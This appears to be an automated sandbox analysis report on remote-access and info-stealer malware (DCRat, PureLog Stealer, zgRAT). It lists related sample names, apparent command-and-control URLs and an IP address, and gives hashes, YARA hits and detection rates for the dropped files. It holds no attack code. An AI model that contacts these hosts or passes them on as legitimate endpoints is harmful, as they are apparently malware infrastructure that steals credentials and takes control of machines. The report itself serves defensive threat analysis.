                                                                         | T3xpD9ZaYu.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php
                                                                         | bR9BxUAkJW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | nazvanie.top/ExternalVmPythonrequestsecurepacketBigloadlocalprivatetemporary.php
                                                                         | Q13mrh42kO.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 267991cm.n9shka.top/videoLowCpugameBigloadProtectuniversalCentralDownloads.php
                                                                        No context
                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                        HARMONYHOSTING-ASFR | HcEvQKWAu2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | k1iZHyRK6K.exe | Get hash | malicious | DCRat | Browse | 37.44.238.250
                                                                         | FuWRu2Mg82.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | cGZV10VyWC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | qZoQEFZUnv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | QDJA9geR12.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | Q9AQFOA6YC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | T3xpD9ZaYu.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | bR9BxUAkJW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                         | Q13mrh42kO.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                        No context
                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                        C:\Users\user\Desktop\EEEoXuLc.log | TGh6AUbQkh.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                         | k1iZHyRK6K.exe | Get hash | malicious | DCRat | Browse |
                                                                         | VfKk5EmvwW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                         | cGZV10VyWC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                         | PbfYaIvR5B.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                         | 9D7RwuJrth.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                         | qZoQEFZUnv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                         | 01YP9Lwum8.exe | Get hash | malicious | DCRat | Browse |
                                                                         | w49A5FG3yg.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                         | 9XHFe6y4Dj.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (524), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):524
                                                                                            Entropy (8bit):5.889850339409401
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:hwgxpoNcKif0QpI3zxjH6NDLKrzufQlJx9Gc8iyF:hhmW0QpAzxjAbgL8f
                                                                                            MD5:6FB8551195B4CDBDEEAE50638921A769
                                                                                            SHA1:ABA997EDCECB1BF891F604D82E1D32A35F16C8A3
                                                                                            SHA-256:2E3A8F21CB40B082A841E6651048874ED18A1801B322BBFFE80B2CE655903959
                                                                                            SHA-512:40846EC2A8AE7A17DBF9F72D308037B95E679DBD4318C9ACE2F8F5AAB90A14BC5B765095FA38A32094C72BCA5B6641DE2A0A9F5B4BB781642FEB97D46856F0AA
                                                                                            Malicious:false
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (488), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):488
                                                                                            Entropy (8bit):5.872764463062388
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:sm0gyHf4q5q2ePZgbQo4UzXzGQoXycUGqOkT+6z0qQOh:6gefj02nb/njG9icnqTTvKOh
                                                                                            MD5:00FBBE994B7F8CB16A9F42AB23AC511E
                                                                                            SHA1:A7928423DCA74B706C82E49C0DD3E9F1DDAB9767
                                                                                            SHA-256:5E5E22EEDE0B796F492521018CFA95F74F779E24CCB7D04E349B51F9E4FC7711
                                                                                            SHA-512:30CDD709576B9143527FF94FE6053A77513DA459DB4604C49DFE8BA30489CFED9C0E509A83050ED858A017AB4D63B7DEFE34852F2E6778DEDA192215F283D1D5
                                                                                            Malicious:false
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (536), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):536
                                                                                            Entropy (8bit):5.904247601588873
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:f+SRBtvpBQgCX1PYkCIXkdrr9UML4mrYPjQaiwVqTCl6:f+oBtLQgCVYGANUMLabiwV7M
                                                                                            MD5:C4407ED3EB90D4AF87B0CBFFDE8FA498
                                                                                            SHA1:D86B8871DA25C131CAC4D03BFF591E2466A30F89
                                                                                            SHA-256:1BDA73484393A9EF47CF91F434C6C746B640561C160645F14710889CF1A75DA0
                                                                                            SHA-512:54AD02B43CBB205814936AB7322396B8E46516685DBFCB3D014B532AB212BEB76E896546AA2AF18FD2954E25657D323FE41510077C4C7FFAC716475D5249108C
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0b12d815, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.42217142137608876
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                            MD5:50962E64EEDEBEE925F72C52C4E65409
                                                                                            SHA1:4739EC514F32479517A5A4ABDA436FDE20DFC854
                                                                                            SHA-256:82B68FE5A97F79A472C01DF7BA9070E666D68A3DF9FDE1C605004BD13F7932E0
                                                                                            SHA-512:AF49C73D684A3EFC0042084BBE3BCD3F375309AC431A2ABC2B36CEA24CA5D065DEEEF29E47AC5A076A66953E31F04741278D26046E2E6DDBD842A36B227401E5
                                                                                            Malicious:false
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (851), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):851
                                                                                            Entropy (8bit):5.889267674031539
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MmeXeoYld/VlJb1D4TTOgNgtJHCVwt9BEvc2ZM:MRYd/VztgNOi29BAc2ZM
                                                                                            MD5:64E2F8F9B5E45158435E94A81ED43E3C
                                                                                            SHA1:7602A97AFEDBC563B334F7ADB7E5E399236F5827
                                                                                            SHA-256:84104B37F2AF8C82606DD383C51F2C3CA439825085A7EC07E9D4F193A2C213D0
                                                                                            SHA-512:44C8165982F7E098457AB0EFBFD77A2C08BE04DC17A9AAA2F9C3C32F0A1E95FFB9F46DFBF08EFC175CBBF1B9D45CAAED434B6A16848DEAB8E9529B5AC770777D
                                                                                            Malicious:false
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (997), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):997
                                                                                            Entropy (8bit):5.91468534654215
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:g0WBmN3kXxkrmfkfOmJvpJnkZB2lRq0IAimNPE4hd0z:tN0BYmsldkZ1/Ai69hCz
                                                                                            MD5:973DF89C7C019CD73D6C58BA1703CE73
                                                                                            SHA1:DBB30F90EDF8A3F302504205EA6ED4607309FCB0
                                                                                            SHA-256:BD120CA73A2747B3E2A62742464A278C8BDC8268E4D4D4485CD399247D9FE744
                                                                                            SHA-512:099EBBA5BE1E7BBB29F805B1B39A5AD57503BB96CEDACFF8AEC8C6DFD6CEBCBB11FC603E7F70DF825426B7BA0976FED4EE0B33FD7A768296E99EF81609B51A7B
                                                                                            Malicious:false
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1306
                                                                                            Entropy (8bit):5.353303787007226
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                                                            MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                                                            SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                                                            SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                                                            SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                                                            Process:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):847
                                                                                            Entropy (8bit):5.354334472896228
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NlllulJnp/p:NllU
                                                                                            MD5:BC6DB77EB243BF62DC31267706650173
                                                                                            SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                            SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                            SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                            Malicious:false
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.323856189774723
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:2eqown:2pow
                                                                                            MD5:AD462ADFD6F7DB5D61C82ADE46C32CD9
                                                                                            SHA1:FC8E3B45F02C861A34313E14D5DC8E6D1441380B
                                                                                            SHA-256:7D507C394FC8BBB96C0A5156736DE7A3F75D92BD810899407EA13BCD0033C0F0
                                                                                            SHA-512:A215DC643C1881F619C8C812D513980F87DB31B6A4D5823322CBBEE547DB600F45DA3B11338EB33696F76B594D65FE2CEA36133F317890C5493C06A088BA0AEC
                                                                                            Malicious:false
                                                                                            Preview:HpgPl6cFpkOjoNzvpSaCefKpU
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Wed Nov 6 00:52:13 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1952
                                                                                            Entropy (8bit):4.544103343404748
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:H1AbW96XOBWDfHvwKXbNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:PBsYKXbMluOulajfqXSfbNtmh5Z
                                                                                            MD5:E7698422C4A90565F1FB2CB5E3B118FE
                                                                                            SHA1:C04B55B64762D57F81C8C9F53D87AB6489239E12
                                                                                            SHA-256:03ACBFD3945C01CFF567353A55629101F80B6668C29996FADF51D9380178BEE0
                                                                                            SHA-512:AFBB2A7DADD160445F50E6093CBF0D9969349C55AA329A35CED0C63112978600F41F4225AF3A2B31301608DB5CBA3F9B49DF96211775249DA5E09AEBCFFBE7B3
                                                                                            Malicious:false
                                                                                            Preview:L.....*g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESA4DA.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\hyperContaineragent.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
